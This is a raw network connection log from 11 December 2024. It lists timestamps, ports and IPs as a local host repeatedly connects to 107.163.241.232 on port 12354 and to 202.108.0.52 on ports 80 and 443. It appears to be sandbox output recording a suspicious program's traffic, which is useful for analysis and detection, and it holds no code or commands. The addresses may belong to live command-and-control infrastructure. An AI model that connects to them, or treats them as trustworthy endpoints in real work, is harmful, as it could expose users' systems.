Dec 11, 2024 16:29:15.627899885 CET	55060	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.633663893 CET	56767	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.794565916 CET	12354	56681	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.794584036 CET	12354	55060	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.794723034 CET	12354	56767	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.794789076 CET	56767	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.795241117 CET	56767	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:15.914772034 CET	12354	56767	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.915133953 CET	12354	56767	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:15.943079948 CET	57028	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.062536001 CET	12354	57028	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.062623978 CET	57028	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.062968969 CET	57028	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.184340000 CET	12354	57028	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.184353113 CET	12354	57028	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.185136080 CET	57231	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.304490089 CET	12354	57231	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.304573059 CET	57231	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.305695057 CET	57231	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.424647093 CET	12354	57231	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.424722910 CET	57231	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.425458908 CET	57231	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.425834894 CET	12354	57231	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.426026106 CET	57363	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.489011049 CET	443	56556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:16.489346027 CET	56556	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.489855051 CET	443	56556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:16.489943027 CET	56556	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.499341011 CET	56556	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.499427080 CET	443	56556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:16.499604940 CET	56556	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.544545889 CET	12354	57231	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.544991016 CET	12354	57231	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.545373917 CET	12354	57363	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.545447111 CET	57363	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.546200991 CET	57363	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.621897936 CET	54599	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.622343063 CET	57473	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.665074110 CET	12354	57363	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.665138006 CET	57363	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.665766954 CET	12354	57363	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.665973902 CET	57363	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.666390896 CET	57493	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.744173050 CET	80	57473	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:16.744194031 CET	80	54599	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:16.744266033 CET	57473	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.744302034 CET	54599	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.744982004 CET	57473	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.787884951 CET	12354	57363	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.794239044 CET	12354	57363	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.794255018 CET	12354	57493	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:16.794326067 CET	57493	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.797487974 CET	57493	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.835241079 CET	57473	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:16.835308075 CET	56681	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.835310936 CET	57493	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.836411953 CET	57675	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.976669073 CET	57843	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:16.977097988 CET	57844	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:17.027115107 CET	80	57473	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:17.027172089 CET	57473	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:17.028458118 CET	12354	57493	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.032119036 CET	57493	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.075042009 CET	12354	57493	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.075660944 CET	12354	57675	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.075814009 CET	57675	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.076100111 CET	57675	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.096177101 CET	12354	57843	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.096247911 CET	57843	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.099584103 CET	57843	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.104904890 CET	80	57844	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:17.104999065 CET	57844	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:17.108660936 CET	57844	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:17.195538044 CET	12354	57675	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.196686029 CET	12354	57675	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.197329044 CET	58049	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.224499941 CET	12354	57843	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.224582911 CET	57843	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.225044012 CET	57843	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.267241001 CET	12354	57843	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.267823935 CET	80	57844	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:17.317470074 CET	12354	58049	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.318650007 CET	58049	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.318802118 CET	58049	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.341434956 CET	58209	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.361375093 CET	12354	57843	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.361391068 CET	12354	57843	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.439203978 CET	12354	58049	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.439336061 CET	12354	58049	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.440727949 CET	58358	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.462502956 CET	12354	58209	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.462618113 CET	58209	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.463100910 CET	58209	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.563189983 CET	12354	58358	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.563323021 CET	58358	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.563736916 CET	58358	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.583437920 CET	12354	58209	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.583760023 CET	12354	58209	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.586575031 CET	58512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.820230961 CET	12354	58358	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.821569920 CET	12354	58512	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:17.821666002 CET	58512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.822046041 CET	58512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:17.941443920 CET	12354	58512	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:18.723203897 CET	80	57844	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:18.723254919 CET	57844	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:18.771100044 CET	59261	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:18.771142960 CET	443	59261	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:18.771200895 CET	59261	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:18.772622108 CET	59261	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:18.772635937 CET	443	59261	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:19.834343910 CET	12354	58358	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:19.834431887 CET	58358	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:19.839153051 CET	58358	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:19.839524984 CET	60331	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:19.942527056 CET	12354	58512	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:19.944180965 CET	58512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:19.945350885 CET	58512	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:19.950211048 CET	60382	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:19.958833933 CET	12354	58358	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:19.959109068 CET	12354	60331	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:19.959256887 CET	60331	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:19.963505983 CET	60331	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.064873934 CET	12354	58512	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.070938110 CET	12354	60382	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.071053982 CET	60382	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.071346998 CET	60382	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.079197884 CET	12354	60331	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.079277992 CET	60331	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.079790115 CET	60331	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.079946995 CET	60510	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.083178043 CET	12354	60331	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.190682888 CET	12354	60382	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.190828085 CET	12354	60382	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.198590040 CET	12354	60331	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.202471972 CET	12354	60331	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.202816010 CET	12354	60510	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.202899933 CET	60510	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.203450918 CET	60510	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.280497074 CET	60772	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.322604895 CET	12354	60510	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.322657108 CET	60510	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.322736025 CET	12354	60510	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.323199987 CET	60510	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.323870897 CET	60820	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.408922911 CET	12354	60772	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.408997059 CET	60772	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.409933090 CET	60772	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.444101095 CET	12354	60510	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.452287912 CET	12354	60510	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.452301979 CET	12354	60820	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.452447891 CET	60820	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.458008051 CET	60820	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.471723080 CET	443	59261	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:20.471792936 CET	59261	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:20.472501993 CET	443	59261	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:20.472543955 CET	59261	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:20.478429079 CET	59261	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:20.478477955 CET	443	59261	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:20.478528976 CET	59261	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:20.533679962 CET	12354	60772	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.580583096 CET	12354	60820	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.589246035 CET	57844	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:20.589596987 CET	60991	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:20.850742102 CET	60820	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.850801945 CET	60772	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.851963043 CET	61199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.899897099 CET	80	60991	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:20.899966955 CET	60991	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:20.900641918 CET	80	57844	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:20.900698900 CET	57844	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:20.967622042 CET	61316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.975020885 CET	12354	61199	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:20.975183010 CET	61199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:20.976165056 CET	61199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:21.097091913 CET	12354	61316	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:21.097174883 CET	61316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:21.101855993 CET	61316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:21.107000113 CET	61389	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:21.112865925 CET	12354	61199	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:21.239018917 CET	12354	61316	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:21.239073992 CET	80	61389	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:21.239152908 CET	61389	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:21.239846945 CET	61389	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:21.359360933 CET	80	61389	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:21.359528065 CET	80	61389	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:21.359540939 CET	61389	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:21.360286951 CET	61389	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:21.487956047 CET	80	61389	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:21.488003016 CET	80	61389	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:21.596162081 CET	61856	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:21.728302956 CET	80	61856	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:21.728395939 CET	61856	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:21.729289055 CET	61856	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:21.871090889 CET	80	61856	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:21.871701002 CET	80	61856	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:22.004229069 CET	62247	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:22.126713037 CET	80	62247	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:22.126816034 CET	62247	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:22.127394915 CET	62247	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:22.251708031 CET	80	62247	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:23.114690065 CET	12354	61199	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.114747047 CET	61199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.114880085 CET	61199	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.115556955 CET	63372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.223392010 CET	12354	61316	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.223453045 CET	61316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.223532915 CET	61316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.230596066 CET	63392	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.237313032 CET	12354	61199	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.237324953 CET	12354	63372	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.237446070 CET	63372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.237684965 CET	63372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.347341061 CET	12354	61316	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.359420061 CET	12354	63392	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.359533072 CET	63392	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.359946012 CET	63392	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.360137939 CET	12354	63372	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.360255957 CET	63372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.361005068 CET	63372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.361391068 CET	63454	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.366421938 CET	12354	63372	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.479499102 CET	12354	63392	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.479542017 CET	12354	63392	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.479569912 CET	63392	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.479795933 CET	12354	63372	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.480707884 CET	12354	63372	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.481714010 CET	12354	63454	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.481842995 CET	63454	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.489929914 CET	63392	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.491262913 CET	63454	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.495491982 CET	63569	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.599196911 CET	12354	63392	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.610543966 CET	12354	63392	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.611862898 CET	12354	63454	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.616524935 CET	12354	63569	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:23.616619110 CET	63569	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.625590086 CET	63569	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:23.754479885 CET	12354	63569	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:24.258080959 CET	80	62247	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:24.260276079 CET	62247	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:25.203994989 CET	63569	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:25.204000950 CET	63454	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:25.383490086 CET	63737	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:25.601583004 CET	12354	63737	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:25.601768017 CET	63737	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:25.656668901 CET	63737	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:25.684031963 CET	63764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:25.684066057 CET	443	63764	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:25.684128046 CET	63764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:25.684541941 CET	63764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:25.684555054 CET	443	63764	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:25.782696009 CET	12354	63737	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:25.799179077 CET	63781	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:25.926112890 CET	12354	63781	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:25.926177979 CET	63781	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:25.927382946 CET	63781	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.057903051 CET	12354	63781	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.057950020 CET	12354	63781	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.060578108 CET	63828	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.184092045 CET	12354	63828	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.184182882 CET	63828	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.185801029 CET	63828	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.322242975 CET	12354	63828	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.322675943 CET	12354	63828	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.323674917 CET	63851	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.447734118 CET	12354	63851	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.448105097 CET	63851	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.452127934 CET	63851	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.579207897 CET	12354	63851	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.582227945 CET	12354	63851	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.592372894 CET	64077	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.825346947 CET	12354	64077	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.825599909 CET	64077	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.825962067 CET	64077	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:26.945323944 CET	12354	64077	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.945869923 CET	12354	64077	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:26.947063923 CET	64597	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:27.066668987 CET	12354	64597	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:27.066935062 CET	64597	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:27.067919970 CET	64597	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:27.188193083 CET	12354	64597	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:27.431613922 CET	443	63764	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:27.431690931 CET	63764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.432444096 CET	443	63764	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:27.432506084 CET	63764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.436073065 CET	63764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.436140060 CET	443	63764	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:27.436203957 CET	63764	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.541791916 CET	62247	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.542273045 CET	65158	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.663005114 CET	80	65158	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:27.663079977 CET	65158	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.663474083 CET	80	62247	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:27.663554907 CET	62247	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.672563076 CET	65158	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:27.723613977 CET	12354	63737	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:27.723681927 CET	63737	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:27.745280027 CET	63737	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:27.746356010 CET	65257	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:27.823581934 CET	80	65158	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:27.865144968 CET	12354	63737	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:27.865870953 CET	12354	65257	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:27.865957022 CET	65257	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:27.897531986 CET	65257	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:28.017061949 CET	12354	65257	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:29.178365946 CET	12354	64597	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:29.178556919 CET	64597	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.217988968 CET	64597	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.218580008 CET	65289	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.279422998 CET	80	65158	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:29.279520988 CET	65158	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.339329004 CET	12354	64597	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:29.339353085 CET	12354	65289	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:29.339448929 CET	65289	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.423795938 CET	65289	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.427611113 CET	65292	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.427664042 CET	443	65292	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:29.427727938 CET	65292	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.471689939 CET	65292	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.471729994 CET	443	65292	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:29.543349028 CET	12354	65289	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:29.663527966 CET	65292	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.663645029 CET	65289	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.663667917 CET	65257	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.665527105 CET	49154	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.785171986 CET	12354	49154	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:29.785257101 CET	49154	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.785605907 CET	49154	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.786859989 CET	65158	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.787329912 CET	49189	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:29.788171053 CET	49190	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:29.904916048 CET	12354	49154	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:29.906552076 CET	80	65158	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:29.906650066 CET	65158	80	192.168.2.7	202.108.0.52
